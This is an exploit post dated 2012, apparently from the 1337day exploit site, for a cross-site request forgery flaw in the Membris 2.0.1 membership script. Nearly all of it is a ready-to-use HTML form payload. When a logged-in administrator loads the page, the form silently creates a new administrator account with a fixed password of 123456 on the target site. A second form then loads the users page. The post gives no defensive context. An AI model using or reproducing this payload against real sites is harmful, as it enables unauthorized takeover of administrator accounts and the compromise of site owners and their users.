facebook facebook twitter rss

Membris v 2.0.1 CSRF Vulnerability (Add Admin)

Author: AtT4CKxT3rR0r1ST , Published: 01-06-2012
Membris v 2.0.1  CSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://scripts.toocharger.com/fiches/scripts/membris/5258.htm
.:. Tested On Demo : http://demo.membris.fr/
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://SITE/admin/ajouter-utilisateur.php">
<input type="hidden" name="identifiant" value="Admin"/>
<input type="hidden" name="email" value="F.Hack@w.cn"/>
<input type="hidden" name="mdp" value="123456"/>
<input type="hidden" name="rmdp" value="123456"/>
<input type="hidden" name="niveau" value="1"/>
<input type="hidden" name="etat" value="1"/>
<input type="hidden" name="prenom" value="Mohamad"/>
<input type="hidden" name="nom" value="Hussien"/>
<input type="hidden" name="lng" value="en"/>
<input type="hidden" name="site" value="http://1337day.com/"/>
<input type="hidden" name="gomail" value="1"/>
</form>
<form method="GET" name="form1" action="http://SITE/admin/utilisateurs.php?msg=ajouter">
<input type="hidden" name="name" value="value"/>
</form>

</body>
</html>

####################################################################


# 1337day.com [2012-06-01]

Like us on Facebook :